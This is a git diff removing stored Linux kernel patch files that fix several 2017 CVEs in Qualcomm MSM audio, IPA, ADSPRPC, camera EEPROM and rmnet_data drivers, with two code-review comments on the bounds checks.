diff --git a/Patches/Linux_CVEs/CVE-2017-0454/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2017-0454/3.18/0002.patch
deleted file mode 100644
index ffa49b26..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0454/3.18/0002.patch
+++ /dev/null
@@ -1,119 +0,0 @@ -From 484349ebc927b7be6cc9187c6bd71ffb3f4112d1 Mon Sep 17 00:00:00 2001 -From: kunleiz -Date: Thu, 22 Dec 2016 18:03:37 +0800 -Subject: ASoC: msm: qdspv2: add mutex lock when access output buffer length - -Add mutex protection to avoid access output_len in parallel. - -CRs-Fixed: 1104067 -Change-Id: I4e17258e2abee9cd68152f4b79520b00003aa80d -Signed-off-by: kunleiz ---- - drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c | 16 +++++++++++++++- - 1 file changed, 15 insertions(+), 1 deletion(-) - -diff --git a/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c b/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c -index 940fd08..9889d9c 100644 ---- a/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c -+++ b/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c -@@ -1,5 +1,5 @@ - /* -- * Copyright (c) 2014-2016, The Linux Foundation. All rights reserved. -+ * Copyright (c) 2014-2017, The Linux Foundation. All rights reserved. - * - * This software is licensed under the terms of the GNU General Public - * License version 2, as published by the Free Software Foundation, and -@@ -29,6 +29,8 @@ struct q6audio_effects { - struct audio_client *ac; - struct msm_hwacc_effects_config config; - -+ struct mutex lock; -+ - atomic_t in_count; - atomic_t out_count; - -@@ -230,8 +232,11 @@ static int audio_effects_shared_ioctl(struct file *file, unsigned cmd, - uint32_t idx = 0; - uint32_t size = 0; - -+ mutex_lock(&effects->lock); -+ - if (!effects->started) { - rc = -EFAULT; -+ mutex_unlock(&effects->lock); - goto ioctl_fail; - } - -@@ -241,11 +246,13 @@ static int audio_effects_shared_ioctl(struct file *file, unsigned cmd, - if (!rc) { - pr_err("%s: write wait_event_timeout\n", __func__); - rc = -EFAULT; -+ mutex_unlock(&effects->lock); - goto ioctl_fail; - } - if (!atomic_read(&effects->out_count)) { - pr_err("%s: pcm stopped out_count 0\n", __func__); - rc = -EFAULT; -+ mutex_unlock(&effects->lock); - goto ioctl_fail; - } - -@@ -255,6 +262,7 @@ static int 
audio_effects_shared_ioctl(struct file *file, unsigned cmd, - copy_from_user(bufptr, (void *)arg, - effects->config.buf_cfg.output_len)) { - rc = -EFAULT; -+ mutex_unlock(&effects->lock); - goto ioctl_fail; - } - rc = q6asm_write(effects->ac, -@@ -262,6 +270,7 @@ static int audio_effects_shared_ioctl(struct file *file, unsigned cmd, - 0, 0, NO_TIMESTAMP); - if (rc < 0) { - rc = -EFAULT; -+ mutex_unlock(&effects->lock); - goto ioctl_fail; - } - atomic_dec(&effects->out_count); -@@ -269,6 +278,7 @@ static int audio_effects_shared_ioctl(struct file *file, unsigned cmd, - pr_err("%s: AUDIO_EFFECTS_WRITE: Buffer dropped\n", - __func__); - } -+ mutex_unlock(&effects->lock); - break; - } - case AUDIO_EFFECTS_READ: { -@@ -466,6 +476,7 @@ static long audio_effects_ioctl(struct file *file, unsigned int cmd, - break; - } - case AUDIO_EFFECTS_SET_BUF_LEN: { -+ mutex_lock(&effects->lock); - if (copy_from_user(&effects->config.buf_cfg, (void *)arg, - sizeof(effects->config.buf_cfg))) { - pr_err("%s: copy from user for AUDIO_EFFECTS_SET_BUF_LEN failed\n", -@@ -475,6 +486,7 @@ static long audio_effects_ioctl(struct file *file, unsigned int cmd, - pr_debug("%s: write buf len: %d, read buf len: %d\n", - __func__, effects->config.buf_cfg.output_len, - effects->config.buf_cfg.input_len); -+ mutex_unlock(&effects->lock); - break; - } - case AUDIO_EFFECTS_GET_BUF_AVAIL: { -@@ -719,6 +731,7 @@ static int audio_effects_release(struct inode *inode, struct file *file) - } - q6asm_audio_client_free(effects->ac); - -+ mutex_destroy(&effects->lock); - kfree(effects); - - pr_debug("%s: close session success\n", __func__); -@@ -749,6 +762,7 @@ static int audio_effects_open(struct inode *inode, struct file *file) - - init_waitqueue_head(&effects->read_wait); - init_waitqueue_head(&effects->write_wait); -+ mutex_init(&effects->lock); - - effects->opened = 0; - effects->started = 0; --- -cgit v1.1 - 
diff --git a/Patches/Linux_CVEs/CVE-2017-0454/4.4/0003.patch b/Patches/Linux_CVEs/CVE-2017-0454/4.4/0003.patch
deleted file mode 100644
index 48fd99e3..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0454/4.4/0003.patch
+++ /dev/null
@@ -1,119 +0,0 @@ -From 263bb8242e005803529cb7cd785354de817db88a Mon Sep 17 00:00:00 2001 -From: kunleiz -Date: Thu, 22 Dec 2016 18:03:37 +0800 -Subject: ASoC: msm: qdspv2: add mutex lock when access output buffer length - -Add mutex protection to avoid access output_len in parallel. - -CRs-Fixed: 1104067 -Change-Id: I4e17258e2abee9cd68152f4b79520b00003aa80d -Signed-off-by: kunleiz ---- - drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c | 16 +++++++++++++++- - 1 file changed, 15 insertions(+), 1 deletion(-) - -diff --git a/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c b/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c -index 940fd08..9889d9c 100644 ---- a/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c -+++ b/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c -@@ -1,5 +1,5 @@ - /* -- * Copyright (c) 2014-2016, The Linux Foundation. All rights reserved. -+ * Copyright (c) 2014-2017, The Linux Foundation. All rights reserved. - * - * This software is licensed under the terms of the GNU General Public - * License version 2, as published by the Free Software Foundation, and -@@ -29,6 +29,8 @@ struct q6audio_effects { - struct audio_client *ac; - struct msm_hwacc_effects_config config; - -+ struct mutex lock; -+ - atomic_t in_count; - atomic_t out_count; - -@@ -230,8 +232,11 @@ static int audio_effects_shared_ioctl(struct file *file, unsigned cmd, - uint32_t idx = 0; - uint32_t size = 0; - -+ mutex_lock(&effects->lock); -+ - if (!effects->started) { - rc = -EFAULT; -+ mutex_unlock(&effects->lock); - goto ioctl_fail; - } - -@@ -241,11 +246,13 @@ static int audio_effects_shared_ioctl(struct file *file, unsigned cmd, - if (!rc) { - pr_err("%s: write wait_event_timeout\n", __func__); - rc = -EFAULT; -+ mutex_unlock(&effects->lock); - goto ioctl_fail; - } - if (!atomic_read(&effects->out_count)) { - pr_err("%s: pcm stopped out_count 0\n", __func__); - rc = -EFAULT; -+ mutex_unlock(&effects->lock); - goto ioctl_fail; - } - -@@ -255,6 +262,7 @@ static int 
audio_effects_shared_ioctl(struct file *file, unsigned cmd, - copy_from_user(bufptr, (void *)arg, - effects->config.buf_cfg.output_len)) { - rc = -EFAULT; -+ mutex_unlock(&effects->lock); - goto ioctl_fail; - } - rc = q6asm_write(effects->ac, -@@ -262,6 +270,7 @@ static int audio_effects_shared_ioctl(struct file *file, unsigned cmd, - 0, 0, NO_TIMESTAMP); - if (rc < 0) { - rc = -EFAULT; -+ mutex_unlock(&effects->lock); - goto ioctl_fail; - } - atomic_dec(&effects->out_count); -@@ -269,6 +278,7 @@ static int audio_effects_shared_ioctl(struct file *file, unsigned cmd, - pr_err("%s: AUDIO_EFFECTS_WRITE: Buffer dropped\n", - __func__); - } -+ mutex_unlock(&effects->lock); - break; - } - case AUDIO_EFFECTS_READ: { -@@ -466,6 +476,7 @@ static long audio_effects_ioctl(struct file *file, unsigned int cmd, - break; - } - case AUDIO_EFFECTS_SET_BUF_LEN: { -+ mutex_lock(&effects->lock); - if (copy_from_user(&effects->config.buf_cfg, (void *)arg, - sizeof(effects->config.buf_cfg))) { - pr_err("%s: copy from user for AUDIO_EFFECTS_SET_BUF_LEN failed\n", -@@ -475,6 +486,7 @@ static long audio_effects_ioctl(struct file *file, unsigned int cmd, - pr_debug("%s: write buf len: %d, read buf len: %d\n", - __func__, effects->config.buf_cfg.output_len, - effects->config.buf_cfg.input_len); -+ mutex_unlock(&effects->lock); - break; - } - case AUDIO_EFFECTS_GET_BUF_AVAIL: { -@@ -719,6 +731,7 @@ static int audio_effects_release(struct inode *inode, struct file *file) - } - q6asm_audio_client_free(effects->ac); - -+ mutex_destroy(&effects->lock); - kfree(effects); - - pr_debug("%s: close session success\n", __func__); -@@ -749,6 +762,7 @@ static int audio_effects_open(struct inode *inode, struct file *file) - - init_waitqueue_head(&effects->read_wait); - init_waitqueue_head(&effects->write_wait); -+ mutex_init(&effects->lock); - - effects->opened = 0; - effects->started = 0; --- -cgit v1.1 - 
diff --git a/Patches/Linux_CVEs/CVE-2017-0455/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0455/ANY/0001.patch
deleted file mode 100644
index 21f3f63d..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0455/ANY/0001.patch
+++ /dev/null
@@ -1,30 +0,0 @@
-From 2c00928b4884fdb0b1661bcc530d7e68c9561a2f Mon Sep 17 00:00:00 2001
-From: Parth Dixit
-Date: Tue, 1 Nov 2016 16:06:21 +0530
-Subject: platform: msm_shared: return correct random number value
-
-random value returned from tz is truncated to one byte in
-existing implementation. Copy all the bytes of random number
-returned from tz.
-
-Change-Id: I12b609206448702d46a98d0fd5fb64b68b2c9801
----
- platform/msm_shared/scm.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/platform/msm_shared/scm.c b/platform/msm_shared/scm.c
-index d5653b5..403441c 100644
---- a/platform/msm_shared/scm.c
-+++ b/platform/msm_shared/scm.c
-@@ -1117,7 +1117,7 @@ int scm_random(uintptr_t * rbuf, uint32_t r_len)
- }
-
- //Copy back into the return buffer
-- *rbuf = *rand_buf;
-+ memscpy(rbuf, r_len, rand_buf, sizeof(rand_buf));
- return ret;
- }
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0456/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0456/ANY/0001.patch
deleted file mode 100644
index 3f291a36..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0456/ANY/0001.patch
+++ /dev/null
@@ -1,38 +0,0 @@
-From dfb170e243a3082a668f77ec0190af2c2bed9161 Mon Sep 17 00:00:00 2001
-From: Ghanim Fodi
-Date: Wed, 8 Feb 2017 17:37:27 +0200
-Subject: msm: ipa: Update IPA rule temp buffer size
-
-IPA filtering and routing temp buffer size
-should be big enough to contain the maximum possible
-rule being composed.
-
-Change-Id: I3f4d7200a0117f41a69adaffcaec07abb19c46ee
-CRs-fixed: 1099598
-Signed-off-by: Ghanim Fodi
----
- drivers/platform/msm/ipa/ipa_v2/ipa_i.h | 4 ++--
- 1 file changed, 2 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/platform/msm/ipa/ipa_v2/ipa_i.h b/drivers/platform/msm/ipa/ipa_v2/ipa_i.h
-index 2407f6c..e5f04fd 100644
---- a/drivers/platform/msm/ipa/ipa_v2/ipa_i.h
-+++ b/drivers/platform/msm/ipa/ipa_v2/ipa_i.h
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2017, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -133,7 +133,7 @@
-
- #define IPA_HW_TABLE_ALIGNMENT(start_ofst) \
- (((start_ofst) + 127) & ~127)
--#define IPA_RT_FLT_HW_RULE_BUF_SIZE (128)
-+#define IPA_RT_FLT_HW_RULE_BUF_SIZE (256)
-
- #define IPA_HDR_PROC_CTX_TABLE_ALIGNMENT_BYTE 8
- #define IPA_HDR_PROC_CTX_TABLE_ALIGNMENT(start_ofst) \
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0457/3.10/0002.patch b/Patches/Linux_CVEs/CVE-2017-0457/3.10/0002.patch
deleted file mode 100644
index fe0e0e97..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0457/3.10/0002.patch
+++ /dev/null
@@ -1,68 +0,0 @@ -From 6f6ce85df80c31048863cd31349e86277d89ff36 Mon Sep 17 00:00:00 2001 -From: Biswajit Paul -Date: Tue, 13 Dec 2016 15:27:30 -0800 -Subject: [PATCH] msm: ADSPRPC: Buffer length to be copied is truncated - -The buffer length that is being used to allocate gets truncated -due to it being assigned to wrong type causing a much smaller -buffer to be allocated than what is required for copying. - -Bug: 31695439 -CRs-Fixed: 1100695 -Change-Id: I30818acd42bd282837c7c7aa16d56d3b95d4dfe7 -Signed-off-by: Sathish Ambley -Signed-off-by: Biswajit Paul ---- - drivers/char/adsprpc.c | 18 ++++++++++++++---- - 1 file changed, 14 insertions(+), 4 deletions(-) - -diff --git a/drivers/char/adsprpc.c b/drivers/char/adsprpc.c -index a9c537b543122..f99855c0cacf5 100644 ---- a/drivers/char/adsprpc.c -+++ b/drivers/char/adsprpc.c -@@ -833,9 +833,9 @@ static int get_args(uint32_t kernel, struct smq_invoke_ctx *ctx, - void *args; - remote_arg_t *pra = ctx->pra; - remote_arg_t *rpra = ctx->rpra; -- ssize_t rlen, used, size; -+ ssize_t rlen, used, size, copylen = 0; - uint32_t sc = ctx->sc, start; -- int i, inh, bufs = 0, err = 0, oix, copylen = 0; -+ int i, inh, bufs = 0, err = 0, oix; - int inbufs = REMOTE_SCALARS_INBUFS(sc); - int outbufs = REMOTE_SCALARS_OUTBUFS(sc); - int cid = ctx->fdata->cid; -@@ -884,13 +884,23 @@ static int get_args(uint32_t kernel, struct smq_invoke_ctx *ctx, - /* calculate len requreed for copying */ - for (oix = 0; oix < inbufs + outbufs; ++oix) { - int i = ctx->overps[oix]->raix; -+ uintptr_t mstart, mend; -+ - if (!pra[i].buf.len) - continue; - if (list[i].num) - continue; - if (ctx->overps[oix]->offset == 0) - copylen = ALIGN(copylen, BALIGN); -- copylen += ctx->overps[oix]->mend - ctx->overps[oix]->mstart; -+ mstart = ctx->overps[oix]->mstart; -+ mend = ctx->overps[oix]->mend; -+ VERIFY(err, (mend - mstart) <= LONG_MAX); -+ if (err) -+ goto bail; -+ copylen += mend - mstart; -+ VERIFY(err, copylen >= 0); -+ if (err) -+ goto bail; - } - - /* 
alocate new buffer */ -@@ -916,7 +926,7 @@ static int get_args(uint32_t kernel, struct smq_invoke_ctx *ctx, - /* copy non ion buffers */ - for (oix = 0; oix < inbufs + outbufs; ++oix) { - int i = ctx->overps[oix]->raix; -- int mlen = ctx->overps[oix]->mend - ctx->overps[oix]->mstart; -+ ssize_t mlen = ctx->overps[oix]->mend - ctx->overps[oix]->mstart; - if (!pra[i].buf.len) - continue; - if (list[i].num) diff --git a/Patches/Linux_CVEs/CVE-2017-0457/3.18/0003.patch b/Patches/Linux_CVEs/CVE-2017-0457/3.18/0003.patch deleted file mode 100644 index b5f7562c..00000000 --- a/Patches/Linux_CVEs/CVE-2017-0457/3.18/0003.patch +++ /dev/null 
@@ -1,57 +0,0 @@ -From f6e21d2a3778bcbbef7320ffbf31631d76679175 Mon Sep 17 00:00:00 2001 -From: Wei Wang -Date: Fri, 13 Jan 2017 20:00:07 -0800 -Subject: [PATCH] msm: ADSPRPC: Buffer length to be copied is truncated - -The buffer length that is being used to allocate gets truncated -due to it being assigned to wrong type causing a much smaller -buffer to be allocated than what is required for copying. - -Bug: 31695439 -CRs-Fixed: 1100695 -Change-Id: I30818acd42bd282837c7c7aa16d56d3b95d4dfe7 -Signed-off-by: Sathish Ambley -Signed-off-by: Biswajit Paul -Signed-off-by: Wei Wang ---- - drivers/char/adsprpc.c | 13 +++++++++++-- - 1 file changed, 11 insertions(+), 2 deletions(-) - -diff --git a/drivers/char/adsprpc.c b/drivers/char/adsprpc.c -index 23e1e8b7d04a4..30a9bf32d0801 100644 ---- a/drivers/char/adsprpc.c -+++ b/drivers/char/adsprpc.c -@@ -972,6 +972,7 @@ static int get_args(uint32_t kernel, struct smq_invoke_ctx *ctx) - /* calculate len requreed for copying */ - for (oix = 0; oix < inbufs + outbufs; ++oix) { - int i = ctx->overps[oix]->raix; -+ uintptr_t mstart, mend; - ssize_t len = lpra[i].buf.len; - if (!len) - continue; -@@ -979,7 +980,15 @@ static int get_args(uint32_t kernel, struct smq_invoke_ctx *ctx) - continue; - if (ctx->overps[oix]->offset == 0) - copylen = ALIGN(copylen, BALIGN); -- copylen += ctx->overps[oix]->mend - ctx->overps[oix]->mstart; -+ mstart = ctx->overps[oix]->mstart; -+ mend = ctx->overps[oix]->mend; -+ VERIFY(err, (mend - mstart) <= LONG_MAX); -+ if (err) -+ goto bail; -+ copylen += mend - mstart; -+ VERIFY(err, copylen >= 0); -+ if (err) -+ goto bail; - } - ctx->used = copylen; - -@@ -1044,7 +1053,7 @@ static int get_args(uint32_t kernel, struct smq_invoke_ctx *ctx) - for (oix = 0; oix < inbufs + outbufs; ++oix) { - int i = ctx->overps[oix]->raix; - struct fastrpc_mmap *map = ctx->maps[i]; -- int mlen = ctx->overps[oix]->mend - ctx->overps[oix]->mstart; -+ ssize_t mlen = ctx->overps[oix]->mend - ctx->overps[oix]->mstart; - uint64_t 
buf; - ssize_t len = lpra[i].buf.len; - if (!len) diff --git a/Patches/Linux_CVEs/CVE-2017-0458/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0458/ANY/0001.patch deleted file mode 100644 index 03b65c5d..00000000 --- a/Patches/Linux_CVEs/CVE-2017-0458/ANY/0001.patch +++ /dev/null 
@@ -1,62 +0,0 @@ -From eba46cb98431ba1d7a6bd859f26f6ad03f1bf4d4 Mon Sep 17 00:00:00 2001 -From: Rajesh Bondugula -Date: Tue, 15 Nov 2016 14:55:35 -0800 -Subject: msm: camera: eeprom: Validate the power setting size - -Validate the power setting size before copying. -If userspace sends a value which is greater than -MAX_POWER_CONFIG, then the driver accesses unintended memory. -This change will fix the issue. - -Crs-Fixed: 1089433 -Signed-off-by: Rajesh Bondugula -Change-Id: Iaaa6f5b3c1c2ac5b5b38b3ac407d6ae394bba780 ---- - .../msm/camera_v2/sensor/eeprom/msm_eeprom.c | 24 +++++++++------------- - 1 file changed, 10 insertions(+), 14 deletions(-) - -diff --git a/drivers/media/platform/msm/camera_v2/sensor/eeprom/msm_eeprom.c b/drivers/media/platform/msm/camera_v2/sensor/eeprom/msm_eeprom.c -index 037e8b5..dd2f919 100644 ---- a/drivers/media/platform/msm/camera_v2/sensor/eeprom/msm_eeprom.c -+++ b/drivers/media/platform/msm/camera_v2/sensor/eeprom/msm_eeprom.c -@@ -1409,6 +1409,16 @@ static int eeprom_init_config32(struct msm_eeprom_ctrl_t *e_ctrl, - - power_info = &(e_ctrl->eboard_info->power_info); - -+ if ((power_setting_array32->size > MAX_POWER_CONFIG) || -+ (power_setting_array32->size_down > MAX_POWER_CONFIG) || -+ (!power_setting_array32->size) || -+ (!power_setting_array32->size_down)) { -+ pr_err("%s:%d invalid power setting size=%d size_down=%d\n", -+ __func__, __LINE__, power_setting_array32->size, -+ power_setting_array32->size_down); -+ rc = -EINVAL; -+ goto free_mem; -+ } - msm_eeprom_copy_power_settings_compat( - power_setting_array, - power_setting_array32); -@@ -1423,20 +1433,6 @@ static int eeprom_init_config32(struct msm_eeprom_ctrl_t *e_ctrl, - power_info->power_down_setting_size = - power_setting_array->size_down; - -- if ((power_info->power_setting_size > -- MAX_POWER_CONFIG) || -- (power_info->power_down_setting_size > -- MAX_POWER_CONFIG) || -- (!power_info->power_down_setting_size) || -- (!power_info->power_setting_size)) { -- rc = -EINVAL; 
-- pr_err("%s:%d Invalid power setting size :%d, %d\n", -- __func__, __LINE__, -- power_info->power_setting_size, -- power_info->power_down_setting_size); -- goto free_mem; -- } -- - if (e_ctrl->i2c_client.cci_client) { - e_ctrl->i2c_client.cci_client->i2c_freq_mode = - cdata32->cfg.eeprom_info.i2c_freq_mode; --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-0459/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0459/ANY/0001.patch deleted file mode 100644 index 87ce8587..00000000 --- a/Patches/Linux_CVEs/CVE-2017-0459/ANY/0001.patch +++ /dev/null 
@@ -1,84 +0,0 @@ -From ffacf6e2dc41b6063c3564791ed7a2f903e7e3b7 Mon Sep 17 00:00:00 2001 -From: Skylar Chang -Date: Wed, 30 Nov 2016 14:41:24 -0800 -Subject: msm: ipa: fix the potential heap overflow on wan-driver - -Add the check on rmnet_ipa3_set_tether_client_pipe API -to make sure not accessing move than QMI_IPA_MAX_PIPES_V01 -entries when user-space module compromised. - -Change-Id: I59d39c7e5743dfea17853b6c4709605d4ebae962 -Signed-off-by: Skylar Chang ---- - drivers/platform/msm/ipa/ipa_v2/rmnet_ipa.c | 19 ++++++++++++++++++- - drivers/platform/msm/ipa/ipa_v3/rmnet_ipa.c | 17 +++++++++++++++++ - 2 files changed, 35 insertions(+), 1 deletion(-) - -diff --git a/drivers/platform/msm/ipa/ipa_v2/rmnet_ipa.c b/drivers/platform/msm/ipa/ipa_v2/rmnet_ipa.c -index f81d637..2c43fc52 100644 ---- a/drivers/platform/msm/ipa/ipa_v2/rmnet_ipa.c -+++ b/drivers/platform/msm/ipa/ipa_v2/rmnet_ipa.c -@@ -2507,7 +2507,7 @@ int rmnet_ipa_set_data_quota(struct wan_ioctl_set_data_quota *data) - * - * Return codes: - * 0: Success -- * -EFAULT: Invalid interface name provided -+ * -EFAULT: Invalid src/dst pipes provided - * other: See ipa_qmi_set_data_quota - */ - int rmnet_ipa_set_tether_client_pipe( -@@ -2515,6 +2515,23 @@ int rmnet_ipa_set_tether_client_pipe( - { - int number, i; - -+ /* error checking if ul_src_pipe_len valid or not*/ -+ if (data->ul_src_pipe_len > QMI_IPA_MAX_PIPES_V01 || -+ data->ul_src_pipe_len < 0) { -+ IPAWANERR("UL src pipes %d exceeding max %d\n", -+ data->ul_src_pipe_len, -+ QMI_IPA_MAX_PIPES_V01); -+ return -EFAULT; -+ } -+ /* error checking if dl_dst_pipe_len valid or not*/ -+ if (data->dl_dst_pipe_len > QMI_IPA_MAX_PIPES_V01 || -+ data->dl_dst_pipe_len < 0) { -+ IPAWANERR("DL dst pipes %d exceeding max %d\n", -+ data->dl_dst_pipe_len, -+ QMI_IPA_MAX_PIPES_V01); -+ return -EFAULT; -+ } -+ - IPAWANDBG("client %d, UL %d, DL %d, reset %d\n", - data->ipa_client, - data->ul_src_pipe_len, -diff --git a/drivers/platform/msm/ipa/ipa_v3/rmnet_ipa.c 
b/drivers/platform/msm/ipa/ipa_v3/rmnet_ipa.c -index 4ed2728..78187c9 100644 ---- a/drivers/platform/msm/ipa/ipa_v3/rmnet_ipa.c -+++ b/drivers/platform/msm/ipa/ipa_v3/rmnet_ipa.c -@@ -2607,6 +2607,23 @@ int rmnet_ipa3_set_tether_client_pipe( - { - int number, i; - -+ /* error checking if ul_src_pipe_len valid or not*/ -+ if (data->ul_src_pipe_len > QMI_IPA_MAX_PIPES_V01 || -+ data->ul_src_pipe_len < 0) { -+ IPAWANERR("UL src pipes %d exceeding max %d\n", -+ data->ul_src_pipe_len, -+ QMI_IPA_MAX_PIPES_V01); -+ return -EFAULT; -+ } -+ /* error checking if dl_dst_pipe_len valid or not*/ -+ if (data->dl_dst_pipe_len > QMI_IPA_MAX_PIPES_V01 || -+ data->dl_dst_pipe_len < 0) { -+ IPAWANERR("DL dst pipes %d exceeding max %d\n", -+ data->dl_dst_pipe_len, -+ QMI_IPA_MAX_PIPES_V01); -+ return -EFAULT; -+ } -+ - IPAWANDBG("client %d, UL %d, DL %d, reset %d\n", - data->ipa_client, - data->ul_src_pipe_len, --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-0460/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-0460/3.10/0001.patch deleted file mode 100644 index 1894a635..00000000 --- a/Patches/Linux_CVEs/CVE-2017-0460/3.10/0001.patch +++ /dev/null 
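Review bot: Both new range checks in rmnet_ipa_set_tether_client_pipe() and rmnet_ipa3_set_tether_client_pipe() return `-EFAULT`, which conventionally reports a bad user address; an out-of-range count is an invalid argument, so `return -EINVAL;` would tell the caller what was actually wrong. The `< 0` half of each test and the `%d` in IPAWANERR only make sense if `ul_src_pipe_len` and `dl_dst_pipe_len` are signed; their declarations are not in the hunks, so that should be confirmed. The ipa_v2 hunk updates the return-code list in the header comment, while the ipa_v3 hunk shows no matching comment change. Both function bodies continue past the hunks, so the loops indexed by these lengths are not visible.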
@@ -1,52 +0,0 @@
-From 93dd37c412dbadff9d5b1b6f7b317713192cab2b Mon Sep 17 00:00:00 2001
-From: Conner Huff
-Date: Thu, 26 Jan 2017 11:52:17 -0800
-Subject: net: rmnet_data: Fix incorrect netlink handling
-
-rmnet_data netlink handler currently does not check for the
-incoming process pid and instead just loops back the pid.
-A malicious root user could potentially send a message with
-source pid 0 and this could cause rmnet_data to loop the message
-back till an out of memory situation occurs.
-
-rmnet_data also does not check for the message length of the
-incoming netlink messages and instead casts the netlink message
-without checking for the boundary.
-
-Fix these two scenarios by adding the pid and message length checks
-respectively.
-
-Bug: 31252965
-CRs-Fixed: 1098801
-Change-Id: I172c1a7112e67e82959b397af7ddfd963d819bdc
-Signed-off-by: Conner Huff
----
- net/rmnet_data/rmnet_data_config.c | 7 ++++++-
- 1 file changed, 6 insertions(+), 1 deletion(-)
-
-diff --git a/net/rmnet_data/rmnet_data_config.c b/net/rmnet_data/rmnet_data_config.c
-index 2a4f56b..04d63989 100644
---- a/net/rmnet_data/rmnet_data_config.c
-+++ b/net/rmnet_data/rmnet_data_config.c
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2013-2015, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2013-2015, 2017 The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -531,6 +531,11 @@ void rmnet_config_netlink_msg_handler(struct sk_buff *skb)
- nlmsg_header = (struct nlmsghdr *) skb->data;
- rmnet_header = (struct rmnet_nl_msg_s *) nlmsg_data(nlmsg_header);
-
-+ if (!nlmsg_header->nlmsg_pid ||
-+ (nlmsg_header->nlmsg_len < sizeof(struct nlmsghdr) +
-+ sizeof(struct rmnet_nl_msg_s)))
-+ return;
-+
- LOGL("Netlink message pid=%d, seq=%d, length=%d, rmnet_type=%d",
- nlmsg_header->nlmsg_pid,
- nlmsg_header->nlmsg_seq,
---
-cgit v1.1
-
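Review bot: The added length test in rmnet_config_netlink_msg_handler() compares `nlmsg_len`, a field the sender fills in, against a fixed minimum but never against `skb->len`, so a message that claims more than it carries still passes, and the header fields are read through the cast before any received size is known. A bound on the received data should come first, e.g. `if (skb->len < sizeof(struct nlmsghdr) || nlmsg_header->nlmsg_len > skb->len) return;`. `nlmsg_pid` is likewise sender-supplied; if the intent is to refuse kernel-originated or looped-back messages, the sender recorded by the socket layer (`NETLINK_CB(skb).portid`) is the value to test, which should be confirmed against how the reply is addressed outside this hunk. The 3.18 and 4.4 copies of this patch that follow add the identical check.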
diff --git a/Patches/Linux_CVEs/CVE-2017-0460/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2017-0460/3.18/0002.patch
deleted file mode 100644
index 28fe2cee..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0460/3.18/0002.patch
+++ /dev/null
@@ -1,52 +0,0 @@
-From 8e2e23126709ebffa1bd91e1a6ac77e16714d852 Mon Sep 17 00:00:00 2001
-From: Conner Huff
-Date: Thu, 12 Jan 2017 22:09:16 -0700
-Subject: net: rmnet_data: Fix incorrect netlink handling
-
-rmnet_data netlink handler currently does not check for the
-incoming process pid and instead just loops back the pid.
-A malicious root user could potentially send a message with
-source pid 0 and this could cause rmnet_data to loop the message
-back till an out of memory situation occurs.
-
-rmnet_data also does not check for the message length of the
-incoming netlink messages and instead casts the netlink message
-without checking for the boundary.
-
-Fix these two scenarios by adding the pid and message length checks
-respectively.
-
-Bug: 31252965
-CRs-Fixed: 1098801
-Change-Id: I172c1a7112e67e82959b397af7ddfd963d819bdc
-Signed-off-by: Conner Huff
----
- net/rmnet_data/rmnet_data_config.c | 7 ++++++-
- 1 file changed, 6 insertions(+), 1 deletion(-)
-
-diff --git a/net/rmnet_data/rmnet_data_config.c b/net/rmnet_data/rmnet_data_config.c
-index 9f5a2cc..7876b74 100644
---- a/net/rmnet_data/rmnet_data_config.c
-+++ b/net/rmnet_data/rmnet_data_config.c
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2013-2015, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2013-2015, 2017 The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -531,6 +531,11 @@ void rmnet_config_netlink_msg_handler(struct sk_buff *skb)
- nlmsg_header = (struct nlmsghdr *) skb->data;
- rmnet_header = (struct rmnet_nl_msg_s *) nlmsg_data(nlmsg_header);
-
-+ if (!nlmsg_header->nlmsg_pid ||
-+ (nlmsg_header->nlmsg_len < sizeof(struct nlmsghdr) +
-+ sizeof(struct rmnet_nl_msg_s)))
-+ return;
-+
- LOGL("Netlink message pid=%d, seq=%d, length=%d, rmnet_type=%d",
- nlmsg_header->nlmsg_pid,
- nlmsg_header->nlmsg_seq,
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0460/4.4/0003.patch b/Patches/Linux_CVEs/CVE-2017-0460/4.4/0003.patch
deleted file mode 100644
index f42e4f26..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0460/4.4/0003.patch
+++ /dev/null
@@ -1,52 +0,0 @@
-From 85cccedb0cae0331228cc58fa91d31810018df98 Mon Sep 17 00:00:00 2001
